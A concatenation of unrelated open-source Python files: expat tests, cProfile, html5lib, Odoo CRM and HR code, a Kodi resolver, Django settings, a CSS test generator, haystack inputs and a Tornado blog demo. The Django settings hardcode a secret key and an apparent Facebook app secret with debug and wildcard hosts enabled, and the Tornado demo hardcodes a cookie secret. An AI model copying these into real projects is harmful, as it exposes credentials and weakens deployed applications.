self.assertEqual(handler_call_args, [(None, None)])
# test UseForeignDTD() is equal to UseForeignDTD(True)
handler_call_args[:] = []
parser = expat.ParserCreate()
parser.UseForeignDTD()
parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
parser.ExternalEntityRefHandler = resolve_entity
parser.Parse(b"<?xml version='1.0'?><element/>")
self.assertEqual(handler_call_args, [(None, None)])
def test_ignore_use_foreign_dtd(self):
"""
If UseForeignDTD is passed True and a document with an external
entity reference is parsed, ExternalEntityRefHandler is called with
the public and system ids from the document.
"""
handler_call_args = []
def resolve_entity(context, base, system_id, public_id):
handler_call_args.append((public_id, system_id))
return 1
parser = expat.ParserCreate()
parser.UseForeignDTD(True)
parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
parser.ExternalEntityRefHandler = resolve_entity
parser.Parse(
b"<?xml version='1.0'?><!DOCTYPE foo PUBLIC 'bar' 'baz'><element/>")
self.assertEqual(handler_call_args, [("bar", "baz")])
if __name__ == "__main__":
unittest.main()
| bsd-3-clause |
invisiblek/python-for-android | python3-alpha/python3-src/Lib/cProfile.py | 79 | 6350 |
#! /usr/bin/env python3
"""Python interface for the 'lsprof' profiler.
Compatible with the 'profile' module.
"""
__all__ = ["run", "runctx", "Profile"]
import _lsprof
# ____________________________________________________________
# Simple interface
def run(statement, filename=None, sort=-1):
"""Run statement under profiler optionally saving results in filename
This function takes a single argument that can be passed to the
"exec" statement, and an optional file name. In all cases this
routine attempts to "exec" its first argument and gather profiling
statistics from the execution. If no file name is present, then this
function automatically prints a simple profiling report, sorted by the
standard name string (file/line/function-name) that is presented in
each line.
"""
prof = Profile()
result = None
try:
try:
prof = prof.run(statement)
except SystemExit:
pass
finally:
if filename is not None:
prof.dump_stats(filename)
else:
result = prof.print_stats(sort)
return result
def runctx(statement, globals, locals, filename=None, sort=-1):
"""Run statement under profiler, supplying your own globals and locals,
optionally saving results in filename.
statement and filename have the same semantics as profile.run
"""
prof = Profile()
result = None
try:
try:
prof = prof.runctx(statement, globals, locals)
except SystemExit:
pass
finally:
if filename is not None:
prof.dump_stats(filename)
else:
result = prof.print_stats(sort)
return result
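# Illustrative usage sketch (not part of the original module): profile a short
# statement and print the report sorted by cumulative time.
#
#   run("sum(x * x for x in range(10**5))", sort='cumulative')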
# ____________________________________________________________
class Profile(_lsprof.Profiler):
"""Profile(custom_timer=None, time_unit=None, subcalls=True, builtins=True)
Builds a profiler object using the specified timer function.
The default timer is a fast built-in one based on real time.
For custom timer functions returning integers, time_unit can
be a float specifying a scale (i.e. how long each integer unit
is, in seconds).
"""
# Most of the functionality is in the base class.
# This subclass only adds convenient and backward-compatible methods.
def print_stats(self, sort=-1):
import pstats
pstats.Stats(self).strip_dirs().sort_stats(sort).print_stats()
def dump_stats(self, file):
import marshal
f = open(file, 'wb')
self.create_stats()
marshal.dump(self.stats, f)
f.close()
def create_stats(self):
self.disable()
self.snapshot_stats()
def snapshot_stats(self):
entries = self.getstats()
self.stats = {}
callersdicts = {}
# call information
for entry in entries:
func = label(entry.code)
nc = entry.callcount # ncalls column of pstats (before '/')
cc = nc - entry.reccallcount # ncalls column of pstats (after '/')
tt = entry.inlinetime # tottime column of pstats
ct = entry.totaltime # cumtime column of pstats
callers = {}
callersdicts[id(entry.code)] = callers
self.stats[func] = cc, nc, tt, ct, callers
# subcall information
for entry in entries:
if entry.calls:
func = label(entry.code)
for subentry in entry.calls:
try:
callers = callersdicts[id(subentry.code)]
except KeyError:
continue
nc = subentry.callcount
cc = nc - subentry.reccallcount
tt = subentry.inlinetime
ct = subentry.totaltime
if func in callers:
prev = callers[func]
nc += prev[0]
cc += prev[1]
tt += prev[2]
ct += prev[3]
callers[func] = nc, cc, tt, ct
# The following two methods can be called by clients to use
# a profiler to profile a statement, given as a string.
def run(self, cmd):
import __main__
dict = __main__.__dict__
return self.runctx(cmd, dict, dict)
def runctx(self, cmd, globals, locals):
self.enable()
try:
exec(cmd, globals, locals)
finally:
self.disable()
return self
# This method is more useful to profile a single function call.
def runcall(self, func, *args, **kw):
self.enable()
try:
return func(*args, **kw)
finally:
self.disable()
# ____________________________________________________________
def label(code):
if isinstance(code, str):
return ('~', 0, code) # built-in functions ('~' sorts at the end)
else:
return (code.co_filename, code.co_firstlineno, code.co_name)
# ____________________________________________________________
def main():
import os, sys
from optparse import OptionParser
usage = "cProfile.py [-o output_file_path] [-s sort] scriptfile [arg] ..."
parser = OptionParser(usage=usage)
parser.allow_interspersed_args = False
parser.add_option('-o', '--outfile', dest="outfile",
help="Save stats to <outfile>", default=None)
parser.add_option('-s', '--sort', dest="sort",
help="Sort order when printing to stdout, based on pstats.Stats class",
default=-1)
if not sys.argv[1:]:
parser.print_usage()
sys.exit(2)
(options, args) = parser.parse_args()
sys.argv[:] = args
if len(args) > 0:
progname = args[0]
sys.path.insert(0, os.path.dirname(progname))
with open(progname, 'rb') as fp:
code = compile(fp.read(), progname, 'exec')
globs = {
'__file__': progname,
'__name__': '__main__',
'__package__': None,
'__cached__': None,
}
runctx(code, globs, None, options.outfile, options.sort)
else:
parser.print_usage()
return parser
# When invoked as main program, invoke the profiler on a script
if __name__ == '__main__':
main()
| apache-2.0 |
TOCyna/tabelinha | flask/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/__init__.py | 1730 | 3405 |
"""A collection of modules for building different kinds of tree from
HTML documents.
To create a treebuilder for a new type of tree, you need to
implement several things:
1) A set of classes for various types of elements: Document, Doctype,
Comment, Element. These must implement the interface of
_base.treebuilders.Node (although comment nodes have a different
signature for their constructor, see treebuilders.etree.Comment)
Textual content may also be implemented as another node type, or not, as
your tree implementation requires.
2) A treebuilder object (called TreeBuilder by convention) that
inherits from treebuilders._base.TreeBuilder. This has 4 required attributes:
documentClass - the class to use for the bottommost node of a document
elementClass - the class to use for HTML Elements
commentClass - the class to use for comments
doctypeClass - the class to use for doctypes
It also has one required method:
getDocument - Returns the root node of the complete document tree
3) If you wish to run the unit tests, you must also create a
testSerializer method on your treebuilder which accepts a node and
returns a string containing Node and its children serialized according
to the format used in the unittests
"""
from __future__ import absolute_import, division, unicode_literals
from ..utils import default_etree
treeBuilderCache = {}
def getTreeBuilder(treeType, implementation=None, **kwargs):
"""Get a TreeBuilder class for various types of tree with built-in support
treeType - the name of the tree type required (case-insensitive). Supported
values are:
"dom" - A generic builder for DOM implementations, defaulting to
an xml.dom.minidom based implementation.
"etree" - A generic builder for tree implementations exposing an
ElementTree-like interface, defaulting to
xml.etree.cElementTree if available and
xml.etree.ElementTree if not.
"lxml" - A etree-based builder for lxml.etree, handling
limitations of lxml's implementation.
implementation - (Currently applies to the "etree" and "dom" tree types). A
module implementing the tree type e.g.
xml.etree.ElementTree or xml.etree.cElementTree."""
treeType = treeType.lower()
if treeType not in treeBuilderCache:
if treeType == "dom":
from . import dom
# Come up with a sane default (pref. from the stdlib)
if implementation is None:
from xml.dom import minidom
implementation = minidom
# NEVER cache here, caching is done in the dom submodule
return dom.getDomModule(implementation, **kwargs).TreeBuilder
elif treeType == "lxml":
from . import etree_lxml
treeBuilderCache[treeType] = etree_lxml.TreeBuilder
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeBuilder
else:
raise ValueError("""Unrecognised treebuilder "%s" """ % treeType)
return treeBuilderCache.get(treeType)
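# Illustrative usage sketch (not part of the original module); assumes the
# html5lib package itself is importable:
#
#   import html5lib
#   parser = html5lib.HTMLParser(tree=getTreeBuilder("dom"))
#   document = parser.parse("<p>Hello</p>")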
| gpl-2.0 |
ovnicraft/odoo | addons/crm/res_partner.py | 159 | 5149 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields,osv
class res_partner(osv.osv):
""" Inherits partner and adds CRM information in the partner form """
_inherit = 'res.partner'
def _opportunity_meeting_phonecall_count(self, cr, uid, ids, field_name, arg, context=None):
res = dict(map(lambda x: (x,{'opportunity_count': 0, 'meeting_count': 0}), ids))
# the user may not have access rights for opportunities or meetings
try:
for partner in self.browse(cr, uid, ids, context):
if partner.is_company:
operator = 'child_of'
else:
operator = '='
opp_ids = self.pool['crm.lead'].search(cr, uid, [('partner_id', operator, partner.id), ('type', '=', 'opportunity'), ('probability', '<', '100')], context=context)
res[partner.id] = {
'opportunity_count': len(opp_ids),
'meeting_count': len(partner.meeting_ids),
}
except:
pass
return res
def _phonecall_count(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for partner in self.browse(cr, uid, ids, context):
res[partner.id] = len(partner.phonecall_ids)
return res
_columns = {
'section_id': fields.many2one('crm.case.section', 'Sales Team'),
'opportunity_ids': fields.one2many('crm.lead', 'partner_id',\
'Leads and Opportunities', domain=[('probability', 'not in', ['0', '100'])]),
'meeting_ids': fields.many2many('calendar.event', 'calendar_event_res_partner_rel','res_partner_id', 'calendar_event_id',
'Meetings'),
'phonecall_ids': fields.one2many('crm.phonecall', 'partner_id',\
'Phonecalls'),
'opportunity_count': fields.function(_opportunity_meeting_phonecall_count, string="Opportunity", type='integer', multi='opp_meet'),
'meeting_count': fields.function(_opportunity_meeting_phonecall_count, string="# Meetings", type='integer', multi='opp_meet'),
'phonecall_count': fields.function(_phonecall_count, string="Phonecalls", type="integer"),
}
def redirect_partner_form(self, cr, uid, partner_id, context=None):
search_view = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'base', 'view_res_partner_filter')
value = {
'domain': "[]",
'view_type': 'form',
'view_mode': 'form,tree',
'res_model': 'res.partner',
'res_id': int(partner_id),
'view_id': False,
'context': context,
'type': 'ir.actions.act_window',
'search_view_id': search_view and search_view[1] or False
}
return value
def make_opportunity(self, cr, uid, ids, opportunity_summary, planned_revenue=0.0, probability=0.0, partner_id=None, context=None):
categ_obj = self.pool.get('crm.case.categ')
categ_ids = categ_obj.search(cr, uid, [('object_id.model','=','crm.lead')])
lead_obj = self.pool.get('crm.lead')
opportunity_ids = {}
for partner in self.browse(cr, uid, ids, context=context):
if not partner_id:
partner_id = partner.id
opportunity_id = lead_obj.create(cr, uid, {
'name' : opportunity_summary,
'planned_revenue' : planned_revenue,
'probability' : probability,
'partner_id' : partner_id,
'categ_ids' : categ_ids and categ_ids[0:1] or [],
'type': 'opportunity'
}, context=context)
opportunity_ids[partner_id] = opportunity_id
return opportunity_ids
def schedule_meeting(self, cr, uid, ids, context=None):
partner_ids = list(ids)
partner_ids.append(self.pool.get('res.users').browse(cr, uid, uid).partner_id.id)
res = self.pool.get('ir.actions.act_window').for_xml_id(cr, uid, 'calendar', 'action_calendar_event', context)
res['context'] = {
'search_default_partner_ids': list(ids),
'default_partner_ids': partner_ids,
}
return res
| agpl-3.0 |
Sup3Roque/Pancas | _OLD/plugin.video.pancas/resources/lib/resolvers/hdcast.py | 23 | 1601 |
# -*- coding: utf-8 -*-
'''
Specto Add-on
Copyright (C) 2015 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urlparse
from resources.lib.libraries import client
def resolve(url):
try:
id = urlparse.parse_qs(urlparse.urlparse(url).query)['id'][0]
pageUrl = 'http://hdcast.me/embedplayer.php?id=%s&autoplay=true' % id
swfUrl = 'http://p.jwpcdn.com/6/12/jwplayer.flash.swf'
result = client.request(pageUrl, referer=pageUrl)
streamer = result.replace('//file', '')
streamer = re.compile("file *: *'(.+?)'").findall(streamer)[-1]
token = re.compile('getJSON[(]"(.+?)".+?json[.]token').findall(result.replace('\n', ''))[-1]
token = client.request(token, referer=pageUrl)
token = re.compile('"token" *: *"(.+?)"').findall(token)[-1]
url = '%s pageUrl=%s swfUrl=%s token=%s live=true timeout=20' % (streamer, pageUrl, swfUrl, token)
return url
except:
return
| gpl-2.0 |
Lh4cKg/django-facebook | example/django_facebook/settings.py | 1 | 3945 |
"""
Django settings for django_facebook project.
Generated by 'django-admin startproject' using Django 1.8.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'n8f#9mr4c0lia#db7em-g4u@-_k#9r^3y8__vf0=b-97kx2n++'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'facebook',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'django_facebook.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, "templates")],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'django_facebook.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'ka'
TIME_ZONE = 'Asia/Tbilisi'
USE_I18N = True
USE_L10N = True
USE_TZ = True
SITE_ID = 1
SITE_URL = ''
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
STATIC_URL = '/static/'
STATIC_ROOT = 'staticfiles'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
#'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# date formats
INPUT_DATE_FORMATS = [
'%m/%d/%Y',
]
# Facebook configuration
FACEBOOK_APP_ID = "1666839843562440"
FACEBOOK_APP_SECRET = "473d6b56341532388fa45f27b89b6a16"
FACEBOOK_URL = "http://www.facebook.com/"
AUTHORIZE_URL = "https://graph.facebook.com/oauth/authorize"
ACCESS_TOKEN_URL = "https://graph.facebook.com/oauth/access_token"
API_URL = "https://graph.facebook.com/v2.5/"
REQUEST_PERMISSIONS_URL = "https://www.facebook.com/dialog/oauth?"
GRAPH_ME_URL = "https://graph.facebook.com/v2.5/me"
FACEBOOK_SCOPE = ["email","user_birthday"] # publish_stream
CALLBACK_URL = "http://localhost:8000/callback/"
# Auth backends
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'facebook.backend.FacebookBackend',
)
| mit |
ddico/odoo | addons/hr/tests/test_hr_flow.py | 6 | 2396 |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo.addons.hr.tests.common import TestHrCommon
class TestHrFlow(TestHrCommon):
def setUp(self):
super(TestHrFlow, self).setUp()
self.dep_rd = self.env['hr.department'].create({
'name': 'Research & Development',
})
self.job_developer = self.env['hr.job'].create({
'name': 'Experienced Developer',
'department_id': self.dep_rd.id,
'no_of_recruitment': 5,
})
self.employee_niv = self.env['hr.employee'].create({
'name': 'Sharlene Rhodes',
})
self.job_developer = self.job_developer.with_user(self.res_users_hr_officer.id)
self.employee_niv = self.employee_niv.with_user(self.res_users_hr_officer.id)
def test_open2recruit2close_job(self):
""" Opening the job position for "Developer" and checking the job status and recruitment count. """
self.job_developer.set_open()
self.assertEqual(self.job_developer.state, 'open', "Job position of 'Job Developer' is in 'open' state.")
self.assertEqual(self.job_developer.no_of_recruitment, 0,
"Wrong number of recruitment for the job 'Job Developer'(%s found instead of 0)."
% self.job_developer.no_of_recruitment)
""" Recruiting employee "NIV" for the job position "Developer" and checking the job status and recruitment count. """
self.job_developer.set_recruit()
self.assertEqual(self.job_developer.state, 'recruit', "Job position of 'Job Developer' is in 'recruit' state.")
self.assertEqual(self.job_developer.no_of_recruitment, 1,
"Wrong number of recruitment for the job 'Job Developer'(%s found instead of 1.0)."
% self.job_developer.no_of_recruitment)
self.employee_niv.write({'job_id': self.job_developer.id})
""" Closing the recruitment for the job position "Developer" by marking it as open. """
self.job_developer.set_open()
self.assertEqual(self.job_developer.state, 'open', "Job position of 'Job Developer' is in 'open' state.")
self.assertEqual(self.job_developer.no_of_recruitment, 0,
"Wrong number of recruitment for the job 'Job Developer'(%s found instead of 0)."
% self.job_developer.no_of_recruitment)
| agpl-3.0 |
szeged/servo | tests/wpt/web-platform-tests/css/vendor-imports/mozilla/mozilla-central-reftests/text-decor-3/support/generate-text-emphasis-line-height-tests.py | 829 | 3431 |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
This script generates tests text-emphasis-line-height-001 ~ 004 except
001z. They test the line height expansion in different directions. This
script outputs a list of all tests it generated in the format of Mozilla
reftest.list to the stdout.
"""
from __future__ import unicode_literals
TEST_FILE = 'text-emphasis-line-height-{:03}{}.html'
TEST_TEMPLATE = '''<!DOCTYPE html>
<meta charset="utf-8">
<title>CSS Test: text-emphasis line height, {pos}, {wm}, {tag}</title>
<link rel="author" title="Xidorn Quan" href="https://www.upsuper.org">
<link rel="author" title="Mozilla" href="https://www.mozilla.org">
<link rel="help" href="https://drafts.csswg.org/css-text-decor-3/#text-emphasis-position-property">
<meta name="assert" content="text emphasis marks should expand the line height like ruby if necessary">
<link rel="match" href="text-emphasis-line-height-{index:03}-ref.html">
<p>Pass if the emphasis marks are {dir} the black line:</p>
{start}試験テスト{end}
'''
REF_FILE = 'text-emphasis-line-height-{:03}-ref.html'
REF_TEMPLATE='''<!DOCTYPE html>
<meta charset="utf-8">
<title>CSS Reference: text-emphasis line height, {pos}</title>
<link rel="author" title="Xidorn Quan" href="https://www.upsuper.org">
<link rel="author" title="Mozilla" href="https://www.mozilla.org">
<style> rt {{ font-variant-east-asian: inherit; }} </style>
<p>Pass if the emphasis marks are {dir} the black line:</p>
<div style="line-height: 1; border-{pos}: 1px solid black; writing-mode: {wm}; ruby-position: {posval}"><ruby>試<rt>●</rt>験<rt>●</rt>テ<rt>●</rt>ス<rt>●</rt>ト<rt>●</rt></ruby></div>
'''
STYLE1 = 'line-height: 1; border-{pos}: 1px solid black; ' + \
'writing-mode: {wm}; text-emphasis-position: {posval};'
STYLE2 = 'text-emphasis: circle;'
TAGS = [
# (tag, start, end)
('div', '<div style="{style1}{style2}">', '</div>'),
('span', '<div style="{style1}"><span style="{style2}">', '</span></div>'),
]
POSITIONS = [
# pos, text-emphasis-position, ruby-position,
# writing-modes, dir text
('top', 'over right', 'over',
['horizontal-tb'], 'below'),
('bottom', 'under right', 'under',
['horizontal-tb'], 'over'),
('right', 'over right', 'over',
['vertical-rl', 'vertical-lr'], 'to the left of'),
('left', 'over left', 'under',
['vertical-rl', 'vertical-lr'], 'to the right of'),
]
import string
def write_file(filename, content):
with open(filename, 'wb') as f:
f.write(content.encode('UTF-8'))
print("# START tests from {}".format(__file__))
idx = 0
for (pos, emphasis_pos, ruby_pos, wms, dir) in POSITIONS:
idx += 1
ref_file = REF_FILE.format(idx)
content = REF_TEMPLATE.format(pos=pos, dir=dir, wm=wms[0], posval=ruby_pos)
write_file(ref_file, content)
suffix = iter(string.ascii_lowercase)
for wm in wms:
style1 = STYLE1.format(pos=pos, wm=wm, posval=emphasis_pos)
for (tag, start, end) in TAGS:
test_file = TEST_FILE.format(idx, next(suffix))
content = TEST_TEMPLATE.format(
pos=pos, wm=wm, tag=tag, index=idx, dir=dir,
start=start.format(style1=style1, style2=STYLE2), end=end)
write_file(test_file, content)
print("== {} {}".format(test_file, ref_file))
print("# END tests from {}".format(__file__))
| mpl-2.0 |
zhangtianyi1234/django-haystack | haystack/inputs.py | 12 | 4603 |
from __future__ import unicode_literals
import re
import warnings
from django.utils.encoding import python_2_unicode_compatible
try:
from django.utils.encoding import force_text
except ImportError:
from django.utils.encoding import force_unicode as force_text
@python_2_unicode_compatible
class BaseInput(object):
"""
The base input type. Doesn't do much. You want ``Raw`` instead.
"""
input_type_name = 'base'
post_process = True
def __init__(self, query_string, **kwargs):
self.query_string = query_string
self.kwargs = kwargs
def __repr__(self):
return u"<%s '%s'>" % (self.__class__.__name__, self.__unicode__().encode('utf8'))
def __str__(self):
return force_text(self.query_string)
def prepare(self, query_obj):
return self.query_string
class Raw(BaseInput):
"""
An input type for passing a query directly to the backend.
Prone to not being very portable.
"""
input_type_name = 'raw'
post_process = False
class PythonData(BaseInput):
"""
Represents a bare Python non-string type.
Largely only for internal use.
"""
input_type_name = 'python_data'
class Clean(BaseInput):
"""
An input type for sanitizing user/untrusted input.
"""
input_type_name = 'clean'
def prepare(self, query_obj):
query_string = super(Clean, self).prepare(query_obj)
return query_obj.clean(query_string)
class Exact(BaseInput):
"""
An input type for making exact matches.
"""
input_type_name = 'exact'
def prepare(self, query_obj):
query_string = super(Exact, self).prepare(query_obj)
if self.kwargs.get('clean', False):
# We need to clean each part of the exact match.
exact_bits = [Clean(bit).prepare(query_obj) for bit in query_string.split(' ') if bit]
query_string = u' '.join(exact_bits)
return query_obj.build_exact_query(query_string)
class Not(Clean):
"""
An input type for negating a query.
"""
input_type_name = 'not'
def prepare(self, query_obj):
query_string = super(Not, self).prepare(query_obj)
return query_obj.build_not_query(query_string)
class AutoQuery(BaseInput):
"""
A convenience class that handles common user queries.
In addition to cleaning all tokens, it handles double quote bits as
exact matches & terms with '-' in front as NOT queries.
"""
input_type_name = 'auto_query'
post_process = False
exact_match_re = re.compile(r'"(?P<phrase>.*?)"')
def prepare(self, query_obj):
query_string = super(AutoQuery, self).prepare(query_obj)
exacts = self.exact_match_re.findall(query_string)
tokens = []
query_bits = []
for rough_token in self.exact_match_re.split(query_string):
if not rough_token:
continue
elif not rough_token in exacts:
# We have something that's not an exact match but may have more
# than one word in it.
tokens.extend(rough_token.split(' '))
else:
tokens.append(rough_token)
for token in tokens:
if not token:
continue
if token in exacts:
query_bits.append(Exact(token, clean=True).prepare(query_obj))
elif token.startswith('-') and len(token) > 1:
# This might break Xapian. Check on this.
query_bits.append(Not(token[1:]).prepare(query_obj))
else:
query_bits.append(Clean(token).prepare(query_obj))
return u' '.join(query_bits)
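# Illustrative behaviour of AutoQuery.prepare (not part of the original module;
# the final string depends on the backend's clean()/build_*_query methods):
#   AutoQuery('pants -shirt "tall people"').prepare(query_obj)
#   -> cleans 'pants', turns '-shirt' into a NOT query via build_not_query,
#      and sends the phrase 'tall people' through build_exact_query before
#      joining the pieces with spaces.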
class AltParser(BaseInput):
"""
If the engine supports it, this input type allows for submitting a query
that uses a different parser.
"""
input_type_name = 'alt_parser'
post_process = False
use_parens = False
def __init__(self, parser_name, query_string='', **kwargs):
self.parser_name = parser_name
self.query_string = query_string
self.kwargs = kwargs
def __repr__(self):
return u"<%s '%s' '%s' '%s'>" % (self.__class__.__name__, self.parser_name, self.query_string, self.kwargs)
def prepare(self, query_obj):
if not hasattr(query_obj, 'build_alt_parser_query'):
warnings.warn("Use of 'AltParser' input type is being ignored, as the '%s' backend doesn't support them." % query_obj)
return ''
return query_obj.build_alt_parser_query(self.parser_name, self.query_string, **self.kwargs)
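# Typical usage from application code (illustrative sketch; assumes a
# configured Haystack backend and the public SearchQuerySet API):
#   from haystack.query import SearchQuerySet
#   from haystack.inputs import AutoQuery, Exact
#   sqs = SearchQuerySet().filter(content=AutoQuery('help -rude "precise phrase"'))
#   sqs = SearchQuerySet().filter(author=Exact('john smith'))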
|
bsd-3-clause
|
cloudkick/cast-site
|
hyde/lib/tornado/demos/blog/blog.py
|
5
|
6902
|
#!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import markdown
import os.path
import re
import tornado.auth
import tornado.database
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
import unicodedata
from tornado.options import define, options
define("port", default=8888, help="run on the given port", type=int)
define("mysql_host", default="127.0.0.1:3306", help="blog database host")
define("mysql_database", default="blog", help="blog database name")
define("mysql_user", default="blog", help="blog database user")
define("mysql_password", default="blog", help="blog database password")
class Application(tornado.web.Application):
def __init__(self):
handlers = [
(r"/", HomeHandler),
(r"/archive", ArchiveHandler),
(r"/feed", FeedHandler),
(r"/entry/([^/]+)", EntryHandler),
(r"/compose", ComposeHandler),
(r"/auth/login", AuthLoginHandler),
(r"/auth/logout", AuthLogoutHandler),
]
settings = dict(
blog_title=u"Tornado Blog",
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
ui_modules={"Entry": EntryModule},
xsrf_cookies=True,
cookie_secret="11oETzKXQAGaYdkL5gEmGeJJFuYh7EQnp2XdTP1o/Vo=",
login_url="/auth/login",
)
tornado.web.Application.__init__(self, handlers, **settings)
# Have one global connection to the blog DB across all handlers
self.db = tornado.database.Connection(
host=options.mysql_host, database=options.mysql_database,
user=options.mysql_user, password=options.mysql_password)
class BaseHandler(tornado.web.RequestHandler):
@property
def db(self):
return self.application.db
def get_current_user(self):
user_id = self.get_secure_cookie("user")
if not user_id: return None
return self.db.get("SELECT * FROM authors WHERE id = %s", int(user_id))
class HomeHandler(BaseHandler):
def get(self):
entries = self.db.query("SELECT * FROM entries ORDER BY published "
"DESC LIMIT 5")
if not entries:
self.redirect("/compose")
return
self.render("home.html", entries=entries)
class EntryHandler(BaseHandler):
def get(self, slug):
entry = self.db.get("SELECT * FROM entries WHERE slug = %s", slug)
if not entry: raise tornado.web.HTTPError(404)
self.render("entry.html", entry=entry)
class ArchiveHandler(BaseHandler):
def get(self):
entries = self.db.query("SELECT * FROM entries ORDER BY published "
"DESC")
self.render("archive.html", entries=entries)
class FeedHandler(BaseHandler):
def get(self):
entries = self.db.query("SELECT * FROM entries ORDER BY published "
"DESC LIMIT 10")
self.set_header("Content-Type", "application/atom+xml")
self.render("feed.xml", entries=entries)
class ComposeHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
id = self.get_argument("id", None)
entry = None
if id:
entry = self.db.get("SELECT * FROM entries WHERE id = %s", int(id))
self.render("compose.html", entry=entry)
@tornado.web.authenticated
def post(self):
id = self.get_argument("id", None)
title = self.get_argument("title")
text = self.get_argument("markdown")
html = markdown.markdown(text)
if id:
entry = self.db.get("SELECT * FROM entries WHERE id = %s", int(id))
if not entry: raise tornado.web.HTTPError(404)
slug = entry.slug
self.db.execute(
"UPDATE entries SET title = %s, markdown = %s, html = %s "
"WHERE id = %s", title, text, html, int(id))
else:
slug = unicodedata.normalize("NFKD", title).encode(
"ascii", "ignore")
slug = re.sub(r"[^\w]+", " ", slug)
slug = "-".join(slug.lower().strip().split())
if not slug: slug = "entry"
while True:
e = self.db.get("SELECT * FROM entries WHERE slug = %s", slug)
if not e: break
slug += "-2"
self.db.execute(
"INSERT INTO entries (author_id,title,slug,markdown,html,"
"published) VALUES (%s,%s,%s,%s,%s,UTC_TIMESTAMP())",
self.current_user.id, title, slug, text, html)
self.redirect("/entry/" + slug)
class AuthLoginHandler(BaseHandler, tornado.auth.GoogleMixin):
@tornado.web.asynchronous
def get(self):
if self.get_argument("openid.mode", None):
self.get_authenticated_user(self.async_callback(self._on_auth))
return
self.authenticate_redirect()
def _on_auth(self, user):
if not user:
raise tornado.web.HTTPError(500, "Google auth failed")
author = self.db.get("SELECT * FROM authors WHERE email = %s",
user["email"])
if not author:
# Auto-create first author
any_author = self.db.get("SELECT * FROM authors LIMIT 1")
if not any_author:
author_id = self.db.execute(
"INSERT INTO authors (email,name) VALUES (%s,%s)",
user["email"], user["name"])
else:
self.redirect("/")
return
else:
author_id = author["id"]
self.set_secure_cookie("user", str(author_id))
